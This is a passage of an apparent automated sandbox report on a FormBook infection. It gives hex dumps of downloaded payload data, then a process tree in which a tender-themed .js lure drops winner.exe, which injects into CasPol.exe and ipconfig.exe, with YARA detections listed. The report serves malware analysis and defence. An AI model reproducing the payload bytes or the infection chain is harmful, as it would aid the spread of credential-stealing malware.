a4 aa 5c 26 4f 08 c9 54 1d d0 5d c1 6f 53 b9 5a b7 5d b0 ee 43 36 4b 95 7a 66 ad fb fa 67 7a f0 38 24 32 12 65 0a 51 79 69 3f 41 96 89 cf 66 4a c3 3a a7 d9 9d 60 e9 e3 33 f9 21 99 9e
                                                                          Data Ascii: 3?LW)a`AK3*w_p\Q-cmT>GwW#mcTvh. +raR{Q>!O?;4-am&$A!c\!%T] Kt'Xm+D$[IhjuqJ:\&OT]oSZ]C6Kzfgz8$2eQyi?AfJ:`3!
                                                                          2023-01-30 12:39:17 UTC492INData Raw: 9a c8 98 19 b5 26 27 54 c6 c8 74 df 3d fa 85 80 45 bb 85 b6 bd 85 7d 76 d6 9b e6 ee 18 67 98 6a f9 53 db 09 e9 5b 7c cd 7f 5d b8 a6 b1 89 01 46 78 d3 dd 9c f2 3f e8 9b 06 2f e8 75 07 d9 24 a1 fd e2 6b 50 32 d0 e0 21 f0 d6 92 72 93 02 e9 16 70 91 3a a4 2c df 77 c4 98 11 4a a6 47 81 c9 18 3c 0d d7 8c 46 45 ce f1 cb 29 22 3b 17 a8 8d 99 16 da e7 30 76 2a 40 96 81 ed 92 d2 8c 6f 9e a8 da 42 26 8b 73 75 67 7b c8 6b 22 32 62 05 bd 95 8e fe 21 63 db d2 88 73 91 94 79 26 45 f8 cf 1a 0c 0d f8 cc 29 0d 1d af 53 95 a0 66 45 5e 87 99 f4 2b dc 37 42 90 c0 c1 11 a2 75 d7 d1 04 0e 13 92 e4 71 69 a1 f1 82 53 cc 3a e0 bc bb 0f 54 da 1e 26 0c 29 79 16 2d 2b 2e d0 44 f3 e3 53 85 b5 ef 13 3e 94 a7 be 2a 37 7e d7 f3 49 40 53 46 38 3a 2b 13 73 56 74 33 af c3 90 f8 48 d8 db 4f
                                                                          Data Ascii: &'Tt=E}vgjS[|]Fx?/u$kP2!rp:,wJG<FE)";0v*@oB&sug{k"2b!csy&E)SfE^+7BuqiS:T&)y-+.DS>*7~I@SF8:+sVt3HO
                                                                          2023-01-30 12:39:17 UTC500INData Raw: 48 04 73 72 71 6d b8 ac b4 be 80 89 68 c4 91 05 90 9e 69 91 20 0d 68 7d 7b ce 28 8d bf c2 67 18 91 f7 7d af 16 05 01 35 5e 45 38 4b 78 9f f7 f0 e2 18 54 ad eb b8 7d b1 1e f9 eb 35 f8 eb 05 21 8f 1d c8 22 f8 92 08 4c 86 d4 3e 52 7b 2d 11 f3 da 22 12 d3 ff f6 fe c2 40 a1 89 11 a6 fd 3f 94 80 22 bd d8 07 86 fd 8f 6a 39 09 6f 7f 0d ba 17 8d d7 44 b3 cd 3c 76 cf c6 8b 58 8d 33 1f d4 87 e7 0e 4c df eb 57 21 4d 3a c2 d5 98 dd 73 03 49 06 9b 8c 84 54 46 c0 99 8e 4d 02 25 bd f3 3a e4 7b 4c 32 51 31 51 d6 68 29 64 a9 5a 3f 25 68 96 77 2f ae 8d 32 2b b8 ad d4 48 7b b0 f6 6d 49 39 5b 86 e1 1b 6d d4 60 16 80 01 4c cd 05 38 45 4b 4c aa ef 36 80 44 31 ea 48 c1 5c 60 3c bb b9 e4 2f c5 5d eb 8d 85 94 3e 2c da 35 b7 d0 5d 94 d6 e7 20 21 be d3 4f 0c e4 20 4d be 5f 45 56 e6
                                                                          Data Ascii: Hsrqmhi h}{(g}5^E8KxT}5!"L>R{-"@?"j9oD<vX3LW!M:sITFM%:{L2Q1Qh)dZ?%hw/2+H{mI9[m`L8EKL6D1H\`</]>,5] !O M_EV
                                                                          2023-01-30 12:39:17 UTC508INData Raw: 3f 84 9f 64 76 36 ee 41 f6 a6 03 80 24 3d e2 51 e7 5b 58 42 3b f3 a9 d4 df 1d c3 af ca 07 0e a9 fd cf e2 00 15 b0 40 19 68 1f d7 5c 57 7a b9 bf 4e de 2a 1c bb f6 9b 9c cc fb db ef 9d 3a 4d fb 8d c2 f2 c4 76 21 12 39 7b fa b1 58 c5 27 1a 34 44 89 10 2f 72 e0 69 b1 f5 55 9d 22 c1 40 d0 72 c3 39 dd 04 d8 e8 fe a6 a8 d4 20 4f 31 45 37 2d ad e6 35 63 ae 97 28 4b 0a 78 09 c3 a2 65 f7 87 9b 0a 0c 7c 11 fb 19 86 d5 95 0e 2a 16 87 8a 70 cd 27 ee 2a 66 70 7c 75 44 90 54 a2 f9 b1 59 c8 cf 14 31 3d de 6b af 68 e0 4c 97 64 fe e4 dc f7 11 06 41 c5 23 f7 df e0 a8 a6 39 7b ae e5 0e a9 35 6f 3f d9 3b 5e d3 eb a8 ba 06 9a 58 3d 37 72 f7 cf 79 43 ba 39 cf a4 b8 2e 1d ff 5e a8 64 d4 89 fa 21 2b c2 31 d0 ae bc c1 08 f4 14 a2 16 28 02 17 8a 0b 84 aa f6 4b a5 da cf 9f b5 7f 6c
                                                                          Data Ascii: ?dv6A$=Q[XB;@h\WzN*:Mv!9{X'4D/riU"@r9 O1E7-5c(Kxe|*p'*fp|uDTY1=khLdA#9{5o?;^X=7ryC9.^d!+1(Kl
                                                                          2023-01-30 12:39:17 UTC516INData Raw: aa f5 19 70 35 5b dc 35 37 59 5a 24 20 18 df 7f 2d 77 74 e3 50 af 35 5c d9 80 27 a0 53 65 c0 c6 61 18 c7 6c 8d e1 6e bf 0b b3 b1 ba 9d 6e ab bc 28 b8 35 0f 32 53 0c 14 60 00 44 90 f6 66 a6 89 fc d8 c2 f4 c1 8b f3 2d 43 1d ab d3 af af 6c 99 b7 1a 71 fe 69 4e 98 cc 8e 3a 19 f3 a2 ef ae 62 08 be 6e e2 5b 5b 19 6e 80 76 eb 91 1c f2 f2 62 68 e4 f7 15 cb 71 17 ae f6 2f b2 c7 22 8c 8f 28 fa 00 8a ee f4 bb 86 c2 b1 a4 47 ed f6 47 9e a3 eb 10 28 8d 57 50 48 03 d3 81 a1 6d c0 3f 62 c0 2b 95 56 b1 0d 2a 18 fd 8a c0 3a 93 f7 7f 39 93 a4 af b5 f0 0a 4c ca f3 56 bf 5d 74 fc b1 04 54 fa 61 c4 b7 7c f2 e1 d5 e5 0f 4a 53 e6 29 c8 b2 4e 94 71 bb 7e 8c db 10 7a 11 6c da 6a 25 dc 70 63 b1 92 3e 28 50 bd 87 82 50 a6 b1 6e dd 83 6a 21 4d 99 ea 1e fb b7 35 fe 90 b1 34 fd b1 1c
                                                                          Data Ascii: p5[57YZ$ -wtP5\'Sealnn(52S`Df-ClqiN:bn[[nvbhq/"(GG(WPHm?b+V*:9LV]tTa|JS)Nq~zlj%pc>(PPnj!M54
                                                                          2023-01-30 12:39:17 UTC523INData Raw: 93 f3 77 7d 1c 1c bd 53 2b 40 fb c1 c6 69 48 c0 4e 0c 5b 7c 7a 58 77 97 94 cc 1d 89 0b 93 02 c7 0b d9 39 b3 e1 d2 da 1a 25 63 ff cd bf 77 67 e0 9c 2d bb 6e 0b 44 f9 86 3b c7 c5 30 d2 51 d0 4e 3b 01 44 46 ab 57 18 90 4f 66 0b e0 73 eb fb 26 fc b6 24 5a 14 3c 31 3d 7e 4b c4 0e a6 cc 29 aa 07 93 a3 46 bd b6 8c 7c 73 a0 75 08 10 74 29 0a fa 05 ae 8a dd e0 f2 a3 80 64 64 0b bb 31 01 99 f8 d6 35 90 ec d7 69 c5 f4 74 84 3e d1 37 bf ec d4 f2 be 35 28 83 0e d0 58 62 0f e7 70 0a 98 ab 45 42 7d 2e ae 16 a5 00 f2 0e 0e b1 68 65 7f 05 ec d2 56 8f 93 f8 5b 73 50 13 d3 09 cd 26 05 7a b1 94 69 7c 77 fc 5f 5a 50 fb 22 b7 fc 47 b2 63 5b 96 89 71 7b 39 f9 79 d1 75 ac 2e 17 d3 ea b1 f2 b0 1e bc 0e f5 b7 21 5a 9b 4a b6 a4 47 80 0c 99 ca b9 a9 f3 73 64 cc a8 65 98 d5 79 3a 91
                                                                          Data Ascii: w}S+@iHN[|zXw9%cwg-nD;0QN;DFWOfs&$Z<1=~K)F|sut)dd15it>75(XbpEB}.heV[sP&zi|w_ZP"Gc[q{9yu.!ZJGsdey:
                                                                          2023-01-30 12:39:17 UTC531INData Raw: f4 22 d7 c4 25 f7 7a aa 77 c6 ad f0 50 ec 40 45 e6 25 16 e4 10 4e 7a b0 eb 3a c0 c3 08 ad 1c a9 f0 7d a3 7b e6 70 6a 3f 89 69 9e 9b 1b 96 84 45 68 7b 40 99 8b 49 f8 76 3f f6 7c 19 f7 76 7d 1f b7 fb c5 64 c2 79 c4 7f 97 9d 63 c2 38 9c bf 08 75 1d db da c1 53 b5 56 27 12 28 b3 2d 24 2d 37 30 ec e5 d8 91 3f aa 9c bb 1d 3e 82 67 1d 86 00 3f ba 84 bb eb e3 be 17 76 f0 b8 c5 24 59 d3 4b cd 03 72 23 a6 1a 41 4a 3c 3b 44 b3 31 12 76 73 b7 8c 53 39 f1 2c 82 c7 00 d6 a5 15 61 65 8e 46 fd 7d 55 63 63 4d 6a 0d 59 dd 08 d0 d4 d9 e7 a5 ec f2 b0 fa 09 0d 9d 94 86 7e f7 dc 27 cb 93 75 73 b6 86 5c 0a 2b 70 a6 75 60 e2 fd d3 89 18 75 24 6f 7a 1d 59 d0 21 96 c5 9e f9 93 15 e3 90 c7 c8 d9 d8 a5 8e c4 b9 6b 25 51 4d 5c 84 ef b4 c5 22 ff db 05 fd 89 0c 38 ab bd cc 42 52 24 7d
                                                                          Data Ascii: "%zwP@E%Nz:}{pj?iEh{@Iv?|v}dyc8uSV'(-$-70?>g?v$YKr#AJ<;D1vsS9,aeF}UccMjY~'us\+pu`u$ozY!k%QM\"8BR$}
                                                                          2023-01-30 12:39:17 UTC539INData Raw: 9b df f8 b7 68 7f 45 20 9d 09 d5 29 34 da 78 18 61 16 7e 53 71 f6 11 3e 65 8d 8f 52 95 e5 8f 2b fa 2b 19 02 6f a5 e8 26 a6 d4 17 20 4e 44 9c 61 d9 e1 3b 30 dd b1 e7 05 f9 4f b2 fc ea f0 73 d0 e1 4d 6d 05 3d 0f 70 d8 30 e6 a6 ab 8d 5b be 1b 90 f1 5c 86 66 d8 a2 57 4e 37 53 89 40 4b 00 7e 6c aa 5d ac 01 2d 45 e2 46 0e b0 ea b1 a5 d5 5a a3 4c 73 f0 34 f2 f9 01 4c 1b dd bd bc 3f c3 ce 75 5e 27 ab c0 c3 e8 40 ba 35 28 da 2e 38 60 7d 69 fe 6e 14 11 e5 98 5d b5 71 77 03 e3 98 34 7c 72 da 0f 7d 9e da 42 78 21 9d 67 b4 6a 41 a3 d1 da e6 45 3d a6 9d 6a 97 10 d5 43 0f 3a 7a 5c 67 6a 47 1a be d2 7c 7b c2 f9 e8 0d b5 b8 b6 79 7b 44 d4 a3 27 48 a7 b1 79 50 ba 68 f2 ba 80 c1 d2 d9 47 b3 a0 0e 16 2d cf 14 1b b1 2e 6e d3 4d b2 0c b8 59 a2 b4 4f 3b a4 35 67 e0 21 41 26 15
                                                                          Data Ascii: hE )4xa~Sq>eR++o& NDa;0OsMm=p0[\fWN7S@K~l]-EFZLs4L?u^'@5(.8`}in]qw4|r}Bx!gjAE=jC:z\gjG|{y{D'HyPhG-.nMYO;5g!A&
                                                                          2023-01-30 12:39:17 UTC547INData Raw: 72 c0 5f 1b b0 e7 68 64 35 5e 05 d0 77 71 ea c8 0a 90 15 8f b4 23 8f 25 f5 96 be 11 a2 45 12 6a 6f b7 63 a5 c1 5b bb 1a 7c 98 ef a6 3f f0 c3 a8 b2 3d 04 41 bc f6 29 29 6e 42 86 65 45 fa a8 b0 6b 26 76 ea bf 6c b1 1a cf 09 46 17 60 d8 82 52 9d d3 67 11 ea 15 40 ac ce fd 4e 95 b2 c3 7c d5 58 4e 72 70 77 c3 16 de f0 b7 12 b0 6e cb 5f 66 2f 22 90 97 cc d1 fd 97 b5 0c 63 23 48 dd 11 e9 8b 3a 2f 4d 5c b0 3d 9c 99 f5 9d f6 78 28 cd 11 4f e6 0a 7b 8e 64 b3 08 c8 fc 43 bd f8 68 78 35 af 2b ec cf 15 f4 32 b5 d5 63 41 33 9c eb 14 5f 7e 0d 58 81 39 67 4c a2 d2 05 df c8 b6 3c eb 8c 6b 9b 90 25 40 95 a2 2a cb e8 21 d3 2a 66 26 4f bd 8f d8 97 32 bb 68 f2 da e6 c5 d5 7f 06 57 8d 4c 2a cb d6 0a 7e e4 4c 23 86 f8 0d 32 d0 90 b8 41 f9 21 37 96 79 0d cc 08 9a 2b 64 27 e1 8f
                                                                          Data Ascii: r_hd5^wq#%Ejoc[|?=A))nBeEk&vlF`Rg@N|XNrpwn_f/"c#H:/M\=x(O{dChx5+2cA3_~X9gL<k%@*!*f&O2hWL*~L#2A!7y+d'
                                                                          2023-01-30 12:39:17 UTC555INData Raw: 7e a8 a0 1b f6 7e 3a a5 b1 7d 3e 94 50 23 13 6f d5 3f cb 91 29 9b 6c 62 0e f8 9a 50 27 8d 14 5f 25 df dd bd f7 8a 48 65 09 21 12 29 bf 7f 28 16 7a d6 b7 4d f9 bf d9 a1 06 8c 81 c2 4b c7 06 47 eb 66 85 f5 27 08 56 be 94 13 0e 16 f4 30 09 16 41 17 6d dd d5 27 ba 11 1a 6e ed d3 ec 6a bc 27 82 43 23 03 19 ef 5e e1 2a 2f fc 34 c9 ac 61 b1 f2 a0 cb 02 01 8c 37 d4 90 6f 4b c8 2e 58 fc 1d 28 b2 35 be 9a 84 71 09 4a a0 0b f9 c9 d8 99 0a 13 87 7c 81 9f ae 2a d3 3b 17 ed 8c 3b b9 52 50 df 3a 85 9c d0 8c ff f1 99 a6 d4 70 22 9c ce 3d 10 3c b7 ed 1c 7d b1 da 13 54 65 2d 0c 8e 30 7d ba d1 2f 27 3b f2 d7 c9 4a 48 63 b5 b0 83 67 f4 44 4f 25 e1 ea 00 64 57 61 86 bf 23 5d 00 9f 8c 7b 74 f9 a8 19 04 d0 1e e4 3d 2f 01 85 77 d6 e3 07 cd 90 13 7c 65 45 79 60 27 40 49 1b 8a 72
                                                                          Data Ascii: ~~:}>P#o?)lbP'_%He!)(zMKGf'V0Am'nj'C#^*/4a7oK.X(5qJ|*;;RP:p"=<}Te-0}/';JHcgDO%dWa#]{t=/w|eEy`'@Ir
                                                                          2023-01-30 12:39:17 UTC563INData Raw: 92 36 9c 8c 54 b0 fa 40 10 a7 d2 2b 07 da f5 07 be 0a 10 85 2d 1c e5 bf 8b 53 35 1a 98 f1 ed 9b 15 de 35 b9 b9 8a b8 33 91 ee d6 f5 5a 1c aa 4e a0 22 b1 fc 20 88 88 9b 20 ce 8e c9 aa 42 6f ec e7 00 01 a7 5c e7 38 9f c6 32 d0 ce a8 6d af 44 c9 c5 ce 3f 5a a2 f4 1e b9 2b e4 10 4f d1 3f 70 3f 98 4d be f5 d7 d3 57 ab a9 76 3f a5 0a 12 5f 4d fa 2d 87 77 d5 b6 b1 42 6a b1 de 56 e1 80 82 b0 94 61 5b 33 00 3d 5a 98 53 6e 4d 36 e4 f6 1d 6d f9 9a e2 90 c3 d3 f7 b3 78 51 e7 e7 e0 8c b7 71 ff 99 e0 62 5a 23 7e 7f 34 04 d4 45 b3 6c 14 45 b5 b3 41 9f 4c 71 55 5a 16 76 88 52 38 b6 12 21 78 26 88 09 e9 8b 8e 27 0c 68 af f2 6e 1d 88 27 a2 19 bf fe f6 3f 6c f0 6f 33 75 1b 60 d3 e1 55 7a da b7 cc f2 93 21 86 77 5b 17 91 6c b9 08 d0 88 6c a3 55 f6 0e 51 7a 5f 02 d9 b5 ff 97
                                                                          Data Ascii: 6T@+-S553ZN" Bo\82mD?Z+O?p?MWv?_M-wBjVa[3=ZSnM6mxQqbZ#~4ElEALqUZvR8!x&'hn'?lo3u`Uz!w[llUQz_
                                                                          2023-01-30 12:39:17 UTC570INData Raw: 86 6e bf 09 75 5f e1 fa 44 e9 e4 45 4e f1 98 c6 f2 5e 9e 8d 88 e7 7b ba 6b fd 86 7d c9 01 12 31 83 74 da c2 4b 5e 36 91 3c 18 ce d5 4c e2 9c ac 6d 6f ce e7 64 67 11 4e 0a d7 01 b6 a8 61 53 e2 ed c4 4a 8b 38 dc e8 66 af 7f ff 8c e6 df 9a cc 5b da f2 8a e7 3c 6c 91 2b 56 8b 40 44 09 43 9f 38 0f b4 78 ff b7 2c 89 b5 0b 02 e0 f0 ec c0 e3 28 b7 5b 62 30 d6 5c d6 f1 e7 d0 be 85 91 84 eb 58 68 c5 61 f4 35 68 00 9f 5d d2 8f 43 30 2d 53 53 4b 57 2a ef 05 34 ad e0 5c 85 f0 f4 9d ac 6d 26 0a 29 55 6b b4 4a 04 5d 69 ae 93 1a 6b bc ba d3 47 0b ce e3 25 c6 63 67 89 6d c7 32 a5 5a 8d 70 0a f6 8f 09 4f 8b 22 89 10 c4 98 64 f8 35 df 10 52 e8 e0 77 c4 d1 1d 0f d4 e6 4e f3 16 71 45 bb c8 c7 e8 fd 56 6f 18 b0 ed eb 25 c2 d6 18 18 5c 09 8b bc 74 da 2b 62 36 2d c9 37 00 89 52
                                                                          Data Ascii: nu_DEN^{k}1tK^6<LmodgNaSJ8f[<l+V@DC8x,([b0\Xha5h]C0-SSKW*4\m&)UkJ]ikG%cgm2ZpO"d5RwNqEVo%\t+b6-7R
                                                                          2023-01-30 12:39:17 UTC578INData Raw: b1 30 4e eb ac 93 79 34 6f 55 bd 33 d6 c8 e7 2b 84 c6 80 99 68 ae 53 5e c9 7e 14 f1 c0 27 49 9a 9e 55 b9 0b 34 42 d4 a0 bc 81 60 fa 10 5d b9 20 35 b1 77 3c 77 c5 f0 67 34 28 fa 3d 35 ec ad bb a7 a7 c2 31 04 c1 92 4e 13 d0 2f da a3 ce da 59 1f 57 84 bb 5d 2b e5 b7 ed 44 0a f0 12 bb 9e 31 91 a2 d1 54 dc 09 18 5e c4 3b 57 a3 bc f0 04 ee 6e fe bc fa 6c 9d 28 51 9b d5 75 d1 60 eb c1 44 98 41 12 c1 86 b3 b6 40 b9 c6 0f e9 31 9a e5 b3 9d f6 27 00 ec be 77 c3 6e 26 30 39 b0 9d f2 c2 4e 6f bd 82 ef f0 c4 c5 e5 4f 3a 9b d3 d7 be b6 67 85 77 72 c5 3e 39 f6 29 99 20 42 02 dd 4e a3 92 46 46 30 44 e4 0f 9b f2 4b 6c 10 97 16 a9 5a d9 7b 6d 34 47 63 e0 b4 32 48 dd b8 c8 32 ff 6d 0b 5e 53 de 42 67 0e f8 55 dc 21 30 62 35 b4 a7 d2 71 20 90 fd 12 eb 64 5a 06 48 5f c5 9e fd
                                                                          Data Ascii: 0Ny4oU3+hS^~'IU4B`] 5w<wg4(=51N/YW]+D1T^;Wnl(Qu`DA@1'wn&09NoO:gwr>9) BNFF0DKlZ{m4Gc2H2m^SBgU!0b5q dZH_
                                                                          2023-01-30 12:39:17 UTC586INData Raw: 2c e5 8c c6 18 2c bd c2 d2 b0 57 c4 21 da 57 a9 9a 6d b5 e5 00 33 83 8c 58 d5 a6 c7 d5 3d 20 4d 8c b0 53 e6 73 cd 08 5c b1 1d b7 bc ad 85 71 8f 96 b7 8a 50 52 0c 86 52 b1 b8 77 0d b7 c5 f7 46 8a f9 32 f7 42 07 30 b0 6c cb 28 ac 0e 01 d8 4d c1 9b b3 ca 0d e4 a0 38 91 78 7b 57 4a dd 28 05 9d ff 63 be 7b e6 89 84 5b 4c bc 9c 59 19 e0 51 4e 07 5b c5 81 ec ef 11 cf 38 9d c3 48 80 10 1d fa 3a ef c7 45 9e 7f 18 7e 0c 04 a3 e7 db 96 dc 37 0d a6 0f 3a 02 ea 1f 4a ae 96 e6 ec 6b fb 13 3e 0d e3 bf bd b7 25 c4 c8 c5 81 ce 1c 97 68 8f f2 c9 4d 24 4b 31 d9 9d 7b 0c e3 ae 5c 66 5e fc 93 64 46 fb ff f7 a4 a5 a1 48 81 da 8c 8c 9d 85 b3 81 65 d2 59 48 b9 e8 6a 88 13 53 de 93 58 54 cb 5f 62 0a 2b 8b 47 27 2b 36 55 50 8f aa 49 a3 7d ab 8e a7 77 a1 9a f9 e1 5a e8 be 4d 7f f9
                                                                          Data Ascii: ,,W!Wm3X= MSs\qPRRwF2B0l(M8x{WJ(c{[LYQN[8H:E~7:Jk>%hM$K1{\f^dFHeYHjSXT_b+G'+6UPI}wZM
                                                                          2023-01-30 12:39:17 UTC594INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0b 02 00 02 01 41 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 49 53 79 73 74 65 6d 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 05 01 00 00 00 1f 53 79 73 74 65 6d 2e 43 6f 64 65 44 6f 6d 2e 4d 65 6d 62 65 72 41 74 74 72 69 62 75
                                                                          Data Ascii: AISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089System.CodeDom.MemberAttribu
                                                                          2023-01-30 12:39:17 UTC602INData Raw: 80 00 00 01 80 00 00 01 80 00 00 07 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ce ce ce 65 d6 d6 d6 ff cf cf cf ff ce ce ce ff cc cc cc ff c9 c9 c9 ff c8 c8 c8 ff c8 c8 c8 ff ca ca ca ff cc cc cc ff ce ce ce ff d0 d0 d0 ff d1 d1 d1 ff d1 d1 d1 ff c6 c6 c6 a5 d2 d2 d2 25 cf cf cf 7f ed ed ed ff e2 e2 e2 ff e3 e3 e3 ff e4 e4 e4 ff e4 e4 e4 ff e5 e5 e5 ff e5 e5 e5 ff e5 e5 e5 ff e4 e4 e4 ff e4 e4 e4 ff e3 e3 e3 ff e2 e2 e2 ff e2 e2 e2 ff d1 d1 d1 ff cc cc cc 7f d0 d0 d0 7f ee ee ee ff e4 e4 e4 ff e6 e6 e6 ff e7 e7 e7 ff e7 e7 e7 ff e8 e8 e8 ff e8 e8 e8 ff e8 e8 e8 ff e7 e7 e7 ff e7 e7 e7 ff e6 e6 e6 ff e4 e4 e4 ff e3 e3 e3 ff d1 d1 d1 ff cd cd cd 7f d0 cf d0 7f ef ef ef ff e7 e7 e7
                                                                          Data Ascii: ( @e%


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:13:38:29
                                                                          Start date:30/01/2023
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0900664 MOHS Tender..js"
                                                                          Imagebase:0x7ff6bcd40000
                                                                          File size:163840 bytes
                                                                          MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:1
                                                                          Start time:13:39:18
                                                                          Start date:30/01/2023
                                                                          Path:C:\Users\user\AppData\Local\Temp\winner.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\winner.exe"
                                                                          Imagebase:0x260000
                                                                          File size:619008 bytes
                                                                          MD5 hash:A9C03263C6DD4A1B672955A5ECADC1FF
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 34%, ReversingLabs
                                                                          Reputation:low

                                                                          General

                                                                          Target ID:2
                                                                          Start time:13:39:20
                                                                          Start date:30/01/2023
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                                          Imagebase:0x820000
                                                                          File size:107624 bytes
                                                                          MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          Reputation:moderate

                                                                          General

                                                                          Target ID:3
                                                                          Start time:13:39:22
                                                                          Start date:30/01/2023
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                          Imagebase:0x7ff69bc80000
                                                                          File size:3933184 bytes
                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:6
                                                                          Start time:13:39:34
                                                                          Start date:30/01/2023
                                                                          Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                          Imagebase:0x1290000
                                                                          File size:29184 bytes
                                                                          MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          Reputation:high

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Call Graph

                                                                          • Executed
                                                                          • Not Executed
